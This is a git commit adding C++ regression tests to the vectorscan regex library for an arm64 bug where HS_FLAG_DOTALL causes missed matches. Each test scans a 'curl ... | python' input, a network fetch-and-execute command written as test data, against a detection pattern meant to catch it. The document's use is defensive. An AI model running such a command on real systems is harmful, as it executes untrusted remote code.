From: Not So Chiken Date: Thu, 16 Apr 2026 10:06:53 +0000 (+0100) Subject: Add unit tests for bug with arm64 HS_FLAG_DOTALL causing false negatives (#391) X-Git-Url: http://git.ipfire.org/?a=commitdiff_plain;p=thirdparty%2Fvectorscan.git Add unit tests for bug with arm64 HS_FLAG_DOTALL causing false negatives (#391) --- diff --git a/unit/hyperscan/regressions.cpp b/unit/hyperscan/regressions.cpp index 320b0d06..eb3bcd90 100644 --- a/unit/hyperscan/regressions.cpp +++ b/unit/hyperscan/regressions.cpp @@ -277,3 +277,189 @@ TEST(bug317, regressionOnx86Bug317) { hs_free_database(database); err = hs_free_scratch(scratch); } + +TEST(ArmRegression, FalseNegativeWithBackslashS_Short) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|\\s*python"; + hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://xxx:8000 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Pattern should match input with 3-char hostname"; + + hs_free_scratch(scratch); + hs_free_database(db); +} + +TEST(ArmRegression, FalseNegativeWithBackslashS_Long) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|\\s*python"; + hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://xxxx:8000 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Pattern should match input with 4-char hostname"; + + hs_free_scratch(scratch); + hs_free_database(db); +} + +TEST(ArmRegression, FalseNegativeWithBackslashS_RealWorld) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|\\s*python"; + hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://vader:8080 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Pattern should match real-world curl|python input"; + + hs_free_scratch(scratch); + hs_free_database(db); +} + +TEST(ArmRegression, FalseNegativeWithBackslashS_CharClassAlsoFails) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|[ \\t]*python"; + hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://xxxx:8000 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Pattern with [ \\t]* should match (but fails due to bug)"; + + hs_free_scratch(scratch); + hs_free_database(db); +} + +TEST(ArmRegression, NoDotAll_Short) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|\\s*python"; + hs_error_t err = hs_compile(pattern, 0, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://xxx:8000 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Without DOTALL: 3-char hostname should match"; + + hs_free_scratch(scratch); + hs_free_database(db); +} + +TEST(ArmRegression, NoDotAll_Long) { + hs_database_t *db = nullptr; + hs_compile_error_t *compile_err = nullptr; + + const char *pattern = "curl.*\\|\\s*python"; + hs_error_t err = hs_compile(pattern, 0, HS_MODE_BLOCK, + nullptr, &db, &compile_err); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(db != nullptr); + + hs_scratch_t *scratch = nullptr; + err = hs_alloc_scratch(db, &scratch); + ASSERT_EQ(HS_SUCCESS, err); + + const char *input = "curl http://xxxx:8000 2>&1 | python"; + + bool matched = false; + auto cb = [](unsigned int, unsigned long long, unsigned long long, + unsigned int, void *ctx) -> int { + *static_cast(ctx) = true; + return 0; + }; + + err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched); + ASSERT_EQ(HS_SUCCESS, err); + ASSERT_TRUE(matched) << "Without DOTALL: 4-char hostname should match"; + + hs_free_scratch(scratch); + hs_free_database(db); +} \ No newline at end of file